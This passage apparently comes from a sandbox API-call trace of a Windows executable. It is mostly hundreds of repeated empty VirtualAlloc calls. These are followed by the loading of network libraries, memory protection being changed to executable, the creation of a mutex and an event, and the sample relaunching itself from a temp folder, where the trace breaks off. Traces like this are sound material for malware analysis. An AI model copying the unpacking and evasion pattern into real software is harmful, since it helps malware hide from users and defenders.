flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.385] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.386] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.387] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.388] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.389] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.390] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.391] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.392] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.393] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.394] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.395] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0048.442] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0048.442] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0048.442] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0048.442] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x4) returned 0x1f0000 [0048.444] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0048.444] GetProcAddress (hModule=0x76590000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x765c480b [0048.444] FreeConsole () returned 0 [0048.444] VirtualProtect (in: lpAddress=0x1f1000, dwSize=0x885f, flNewProtect=0x20, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0048.444] VirtualProtect (in: lpAddress=0x1fa000, dwSize=0xb12, flNewProtect=0x2, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0048.444] VirtualProtect (in: lpAddress=0x1fb000, dwSize=0xbd8, flNewProtect=0x4, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0048.444] VirtualProtect (in: lpAddress=0x1fc000, dwSize=0x4d8, flNewProtect=0x2, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0048.444] VirtualProtect (in: lpAddress=0x1f0000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0050.200] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fc18, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe")) returned 0x2e [0050.200] _snwprintf (in: _Dest=0x12fe20, _Count=0x40, _Format="E%X" | out: _Dest="EACA73F0A") returned 9 [0050.200] _snwprintf (in: _Dest=0x12fea0, _Count=0x40, _Format="M%X" | out: _Dest="MACA73F0A") returned 9 [0050.200] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="EACA73F0A") returned 0xc0 [0050.200] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="MACA73F0A") returned 0xc4 [0050.200] GetLastError () returned 0x0 [0050.200] CreateProcessW (in: lpApplicationName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ff20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), 